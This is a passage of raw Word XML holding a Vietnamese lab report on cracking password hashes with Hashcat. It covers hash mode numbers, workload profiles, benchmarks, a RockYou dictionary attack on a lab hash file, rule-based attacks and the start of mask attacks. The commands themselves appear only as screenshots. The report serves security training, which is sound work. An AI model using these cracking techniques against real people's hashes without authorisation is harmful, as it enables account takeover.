        <w:t xml:space="preserve"> tứng với</w:t>
      </w:r>
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve"> các loại </w:t>
      </w:r>
      <w:r w:rsidR="00A16098">
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="0074017C">
        <w:t xml:space="preserve"> nhất định để có thể chỉ ra những số nào sẽ sử dụng với tùy chọn -m. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF73397" w14:textId="32F997D5" w:rsidR="00A16098" w:rsidRDefault="00A16098" w:rsidP="00BF1028">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C42865F" wp14:editId="28960DAD">
            <wp:extent cx="6858000" cy="1452880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1009115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5037" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1452880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="110D5FFE" w14:textId="3EF7E70B" w:rsidR="00A16098" w:rsidRDefault="00A16098" w:rsidP="00BF1028">
      <w:r>
        <w:t>Ta thấy LM hash tương ứng với số 3000</w:t>
      </w:r>
      <w:r w:rsidR="00387699">
        <w:t xml:space="preserve"> và NTLM ứng với 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298B29F7" w14:textId="5E87F5D9" w:rsidR="00A16098" w:rsidRDefault="00A16098" w:rsidP="00BF1028">
      <w:r>
        <w:t xml:space="preserve">Tìm kiếm </w:t>
      </w:r>
      <w:r w:rsidR="00BA6922">
        <w:t xml:space="preserve">số ứng với </w:t>
      </w:r>
      <w:r>
        <w:t>loại hash MD5 có salt (md5crypt</w:t>
      </w:r>
      <w:r w:rsidR="00BA6922">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BFE622" w14:textId="28D0C035" w:rsidR="00BA6922" w:rsidRDefault="00BA6922" w:rsidP="00BF1028">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B6A7044" wp14:editId="6B2641C6">
            <wp:extent cx="6858000" cy="468630"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="113807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1823" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="468630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCA5E6A" w14:textId="6589477A" w:rsidR="00BA6922" w:rsidRDefault="00BA6922" w:rsidP="00BF1028">
      <w:r>
        <w:t>Ta có thể chạy Hashca</w:t>
      </w:r>
      <w:r w:rsidR="009C65CA">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> với -m 500 để crack loại hash này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C737EEB" w14:textId="20EF8091" w:rsidR="00BA6922" w:rsidRDefault="00BA6922" w:rsidP="00BA6922">
      <w:r>
        <w:t>Tìm kiếm số ứng với loại hash SHA512</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A0FECE" w14:textId="4415D749" w:rsidR="009C65CA" w:rsidRDefault="009C65CA" w:rsidP="00BA6922">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14F0EE21" wp14:editId="6E7D764D">
            <wp:extent cx="6858000" cy="1625600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="70719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7257" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId80"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1625600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F458F4" w14:textId="542A4024" w:rsidR="00BA6922" w:rsidRDefault="00BA6922" w:rsidP="00BA6922">
      <w:r w:rsidRPr="001855B2">
        <w:t>Chúng ta có thể thấy rằng đối với mật khẩu SHA512</w:t>
      </w:r>
      <w:r w:rsidR="009C65CA">
        <w:t xml:space="preserve"> trong operating system</w:t>
      </w:r>
      <w:r w:rsidRPr="001855B2">
        <w:t xml:space="preserve">, Hashcat sử dụng -m 1800 . </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67052CC1" w14:textId="49AF26DD" w:rsidR="00BA6922" w:rsidRDefault="00BA6922" w:rsidP="00BA6922">
      <w:r w:rsidRPr="001855B2">
        <w:t xml:space="preserve">Bây giờ chúng ta hãy thực hiện một số </w:t>
      </w:r>
      <w:r>
        <w:t>đánh giá</w:t>
      </w:r>
      <w:r w:rsidRPr="001855B2">
        <w:t xml:space="preserve"> hiệu suất, bắt đầu bằng -m 3000 , dành cho hàm băm LM. Lưu ý rằng chúng ta sẽ gọi Hashcat bằng</w:t>
      </w:r>
      <w:r w:rsidR="009C65CA">
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
      <w:r w:rsidRPr="001855B2">
        <w:t xml:space="preserve"> -w 3, </w:t>
      </w:r>
      <w:r w:rsidR="009C65CA">
        <w:t>tức</w:t>
      </w:r>
      <w:r w:rsidRPr="001855B2">
        <w:t xml:space="preserve"> là chúng ta </w:t>
      </w:r>
      <w:r w:rsidR="009C65CA">
        <w:t>sử dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="001855B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C65CA">
        <w:t>Workload profile</w:t>
      </w:r>
      <w:r w:rsidRPr="001855B2">
        <w:t xml:space="preserve"> ( -w ) số 3. Các tùy chọn khác nhau cho -w bao gồm: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4DC08B" w14:textId="77777777" w:rsidR="009C65CA" w:rsidRDefault="00BA6922" w:rsidP="009C65CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001855B2">
        <w:t xml:space="preserve">1: </w:t>
      </w:r>
      <w:r w:rsidR="009C65CA">
        <w:t>Low</w:t>
      </w:r>
      <w:r w:rsidRPr="001855B2">
        <w:t xml:space="preserve">. Tác động tối thiểu đến hiệu suất GUI và mức </w:t>
      </w:r>
      <w:r w:rsidR="009C65CA">
        <w:t>sử dụng tài nguyên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38521AD8" w14:textId="47E05AB4" w:rsidR="00BA6922" w:rsidRDefault="00BA6922" w:rsidP="00BA6922">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001855B2">
        <w:t xml:space="preserve">2: </w:t>
      </w:r>
      <w:r w:rsidR="009C65CA">
        <w:t>Default</w:t>
      </w:r>
      <w:r w:rsidRPr="001855B2">
        <w:t xml:space="preserve">. Tác động rõ rệt đến GUI và mức </w:t>
      </w:r>
      <w:r w:rsidR="009C65CA">
        <w:t>sử dụng tài nguyên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DC9E9F" w14:textId="79DDD577" w:rsidR="00BA6922" w:rsidRDefault="00BA6922" w:rsidP="00BA6922">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001855B2">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3: </w:t>
      </w:r>
      <w:r w:rsidR="009C65CA">
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidRPr="001855B2">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009C65CA">
        <w:t>Sử dụng nhiều tài nguyên và có thể không phản hồi GUI</w:t>
      </w:r>
      <w:r w:rsidRPr="001855B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABDFE8B" w14:textId="5697ECA3" w:rsidR="00BA6922" w:rsidRDefault="00BA6922" w:rsidP="00BA6922">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="001855B2">
        <w:t xml:space="preserve">4: </w:t>
      </w:r>
      <w:r w:rsidR="009C65CA">
        <w:t>Nightmare</w:t>
      </w:r>
      <w:r w:rsidRPr="001855B2">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009C65CA">
        <w:t>Sử dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="001855B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C65CA">
        <w:t>rất nhiều tài nguyên và có thể không đủ CPU hoặc GPU để phản hồi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F79178" w14:textId="0CF013FF" w:rsidR="00BA6922" w:rsidRDefault="009C65CA" w:rsidP="00BA6922">
      <w:r>
        <w:t>Trong bài lab này, ta sử dụng -w 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB24D1F" w14:textId="33D25D94" w:rsidR="009C65CA" w:rsidRDefault="009C65CA" w:rsidP="00BA6922">
      <w:r>
        <w:t>Đánh giá hiệu suất khi crack hashtype -m 3000 (LM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC746FA" w14:textId="52EAAF66" w:rsidR="009C65CA" w:rsidRDefault="009C65CA" w:rsidP="00BA6922">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1057BD8A" wp14:editId="08EBE0BE">
            <wp:extent cx="6858000" cy="3170555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36163612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36122" name="Picture 1" descr="A screenshot of a computer error&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="3170555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D85C145" w14:textId="69CA5780" w:rsidR="009C65CA" w:rsidRDefault="009C65CA" w:rsidP="00BA6922">
      <w:r>
        <w:t>Ta có thể thấy hiệu suất được thể hiện dưới dạng kilohashes per second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145077E6" w14:textId="123BC2E4" w:rsidR="009C65CA" w:rsidRDefault="009C65CA" w:rsidP="00BA6922">
      <w:r>
        <w:t>Đánh giá hiệu suất khi crack md5crypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD692E6" w14:textId="1318ADCE" w:rsidR="009C65CA" w:rsidRDefault="002E68AD" w:rsidP="00BA6922">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34D06A1D" wp14:editId="58C30E68">
            <wp:extent cx="6858000" cy="3286760"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="170688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9363" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId82"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="3286760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D8CF1E" w14:textId="1BFCBBF3" w:rsidR="002E68AD" w:rsidRDefault="002E68AD" w:rsidP="00BA6922">
      <w:r>
        <w:t>Crack sha512</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4E1CF2" w14:textId="547324CD" w:rsidR="002E68AD" w:rsidRDefault="002E68AD" w:rsidP="00BA6922">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6057AB68" wp14:editId="22F45E72">
            <wp:extent cx="6858000" cy="3528060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="330219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9125" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId83"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="3528060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6013BA0E" w14:textId="7920F561" w:rsidR="002E68AD" w:rsidRDefault="002E68AD" w:rsidP="00BA6922">
      <w:r>
        <w:t>Tốc độ crack giảm dần</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF7B3E" w14:textId="15D5514B" w:rsidR="002E68AD" w:rsidRDefault="002E68AD" w:rsidP="002E68AD">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cracking with Hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16900F76" w14:textId="2FADDC16" w:rsidR="00387699" w:rsidRDefault="00855FAE" w:rsidP="00BA6922">
      <w:r>
        <w:t xml:space="preserve">Chúng ta sẽ </w:t>
      </w:r>
      <w:r w:rsidR="00387699">
        <w:t>dùng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hashcat để crack mật khẩu file web01.hashes</w:t>
      </w:r>
      <w:r w:rsidR="00387699">
        <w:t xml:space="preserve"> với file từ điển RockYou. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B4F357" w14:textId="2953FFFB" w:rsidR="009C65CA" w:rsidRDefault="00387699" w:rsidP="00BA6922">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D5C1718" wp14:editId="626A7694">
            <wp:extent cx="6858000" cy="323850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="75882061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20613" name="Picture 1" descr="A screenshot of a computer error&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId84"/>
                    <a:srcRect b="92727"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="323850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="751D4639" w14:textId="7AA3DA71" w:rsidR="004B1870" w:rsidRDefault="00387699" w:rsidP="0054519A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B000D52" wp14:editId="4C0BEEC3">
            <wp:extent cx="4714875" cy="2133600"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="15916003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0306" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4714875" cy="2133600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8CEB87" w14:textId="59BA6945" w:rsidR="00387699" w:rsidRDefault="00387699" w:rsidP="0054519A">
      <w:r>
        <w:t>Ta đã crack 10 password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B3F363" w14:textId="6A8D2D2C" w:rsidR="00387699" w:rsidRDefault="00387699" w:rsidP="0054519A">
      <w:r>
        <w:t>Giờ ta hãy xem rules trong hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A924CA2" w14:textId="6BB4F085" w:rsidR="00387699" w:rsidRDefault="00387699" w:rsidP="0054519A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="177C00B3" wp14:editId="39C0E24D">
            <wp:extent cx="6858000" cy="1381760"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="8833832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3288" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId86"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1381760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB540E0" w14:textId="557D7AC0" w:rsidR="00387699" w:rsidRDefault="00387699" w:rsidP="0054519A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49DAF975" wp14:editId="70A0D1F2">
            <wp:extent cx="6829425" cy="5353050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="182845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6206" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId87"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6829425" cy="5353050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B8AF6C" w14:textId="1E373A9C" w:rsidR="00CA33F3" w:rsidRDefault="00CA33F3" w:rsidP="0054519A">
      <w:r>
        <w:t>$0 $0 – password00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49337E2D" w14:textId="0E84D0BB" w:rsidR="00387699" w:rsidRDefault="00387699" w:rsidP="0054519A">
      <w:r>
        <w:t xml:space="preserve">: - as   ;   r – reverse     ;    u – all uppercase     ;  T0 </w:t>
      </w:r>
      <w:r w:rsidR="00CA33F3">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA33F3">
        <w:t>thêm khoảng trắng vào cuối từ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193A1BA0" w14:textId="255ED6CF" w:rsidR="00CA33F3" w:rsidRDefault="00CA33F3" w:rsidP="0054519A">
      <w:r>
        <w:t>Mỗi từ sẽ được lấy và được thêm vào sau nó một số</w:t>
      </w:r>
      <w:r w:rsidR="00360AD0">
        <w:t xml:space="preserve"> để tăng khẳ năng crack mật khẩu thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB7FAE4" w14:textId="0BA89D35" w:rsidR="00360AD0" w:rsidRDefault="00360AD0" w:rsidP="0054519A">
      <w:r>
        <w:t xml:space="preserve">Áp dụng rules này với -r </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3D46E7" w14:textId="06482FFE" w:rsidR="00360AD0" w:rsidRDefault="00360AD0" w:rsidP="0054519A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A65E54A" wp14:editId="387B205C">
            <wp:extent cx="6858000" cy="426720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10321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107" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="426720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03797E99" w14:textId="58E44F3F" w:rsidR="00360AD0" w:rsidRDefault="00360AD0" w:rsidP="0054519A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49C1091D" wp14:editId="2361DA4D">
            <wp:extent cx="6858000" cy="2301875"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="14537482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8275" name="Picture 1" descr="A screenshot of a computer error&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId89"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2301875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADC9CA0" w14:textId="589A1C00" w:rsidR="00360AD0" w:rsidRDefault="00360AD0" w:rsidP="0054519A">
      <w:r>
        <w:t>Ta đã tìm thấy thêm 2 mật khẩu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138311BA" w14:textId="42F813EA" w:rsidR="00360AD0" w:rsidRDefault="00360AD0" w:rsidP="0054519A">
      <w:r>
        <w:t>Kiểm tra kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB4E849" w14:textId="36620ADF" w:rsidR="00360AD0" w:rsidRDefault="00360AD0" w:rsidP="0054519A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A47F0F7" wp14:editId="6CD89D8F">
            <wp:extent cx="6858000" cy="2220595"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="6486438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3897" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId90"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2220595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E2B329" w14:textId="15C3A448" w:rsidR="00360AD0" w:rsidRDefault="00360AD0" w:rsidP="00360AD0">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hashcat và Masking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246F1B52" w14:textId="189EE419" w:rsidR="00360AD0" w:rsidRDefault="00360AD0" w:rsidP="00360AD0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="500F6B92" wp14:editId="09B404BF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4352925</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2352675" cy="2743200"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="2056859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9543"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52675" cy="2743200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Luật được cung cấp trong hashcat đã giúp ta thành công hơn trong việc crack mật khẩu. Tuy nhiên ra cần tùy chỉnh nó một chút. </w:t>
      </w:r>
      <w:r w:rsidR="00A605E7">
        <w:t xml:space="preserve">Nhìn vào rule mặc định ta thấy không phải tất cả các chữ số được thêm vào sau mỗi từ. Ta cần sử dụng ?d?d để thêm tất cả các chữ số có thể vào sau từ. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2252F425" w14:textId="2CA6133F" w:rsidR="00A605E7" w:rsidRDefault="00A605E7" w:rsidP="00360AD0">
      <w:r>
        <w:t xml:space="preserve">Áp dụng ?d?d để tấn công, lần này ta sử dụng từ điển Tiếng Anh để làm từ điển crack. </w:t>
      </w:r>
    </w:p>
